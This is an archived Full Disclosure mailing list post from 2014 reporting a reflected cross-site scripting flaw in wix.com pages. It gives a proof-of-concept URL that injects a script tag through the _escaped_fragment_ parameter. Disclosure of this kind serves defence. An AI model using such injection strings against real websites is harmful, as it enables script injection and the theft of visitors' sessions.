Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

XSS in WIX pages

From: Devsec Security Departament <security () mail devsec cl>
Date: Mon, 01 Dec 2014 11:14:34 -0300
57 million web pages are affected by a security problem in wix.com

Proof of concept of a web page made in wix.com:
http://www.itsec.cl/

to see the source code can observe the following:

...
Find the SEO content of this site's homepage via http://www.itsec.cl/?_escaped_fragment_= (That is where search engines like Google go to read your homepage's content.) 
...
tried to access an existing section and added a third invalid parameter, after that launched the attack code: 

Valid URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/

XSS URL:
http://www.itsec.cl/?_escaped_fragment_=partners/c1ryi/x";><script>alert('xss')</script>

How cheap is expensive.


/Devsec, Security Departament. Chile./

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: